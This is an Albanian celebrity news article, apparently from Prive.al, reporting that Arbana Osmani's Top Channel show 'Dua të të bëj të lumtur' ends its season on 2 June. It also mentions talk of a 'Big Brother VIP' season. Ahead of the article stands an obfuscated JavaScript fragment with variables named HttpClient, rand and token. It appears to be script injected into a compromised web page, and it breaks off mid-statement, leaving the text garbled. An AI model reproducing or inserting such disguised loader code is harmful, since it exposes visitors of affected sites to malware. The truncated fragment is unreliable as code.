;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Programi i Arbanës drejt mbylljes!

By

Me 17 Shkurt, prezantuesja Arbana Osmani nisi aventurën televizive në ‘Dua të të bëj të lumtur’.

Ky sezon, i dyti për programin ishte më me peshë për prezantuesen për faktin se kësaj rradhe kishte edhe përgjegjësinë e bashkëautores.

Formula e rifreskuar rezultoi sukses më vete për faktin që ndryshe prej shumë prodhimeve televizive të Top Channel në vitet e fundit, Arbana me ‘Dua të të bëj të lumtur’ triumfoi me audiencë nga java në javë një garë goxha të fortë me konkurentët.

Por, duket se pushimet për emisionin nisin poashtu mjaft herët.

Tre muaj e gjysmë sezon përmbyllen javën e ardhshme me 2 Qershor kur edhe do të transmetohet puntata e fundit e programit.

Këtë e ka bërë të ditur vetë Arbana përmes një postimi në Instagram, mbase duke dëshpëruar shumë ndjekës të programit që në tre muajt e fundit e kanë pritur nga java në javë me entuziazëm.

Ndryshe, nuk dihet nëse Arbana vjen me ndonjë program të ri në sezonin e ardhshëm televiziv në të cilin është përfolur edhe nisja e ‘Big Brother VIP’, ku prezantuese supozohet të jetë Luana Vjollca.

Mbetet të shihen risitë që do i sjellë Topi në sezonin e ardhshëm (nëse do ketë të tilla). /Prive.al

Artikuj të ngjashëm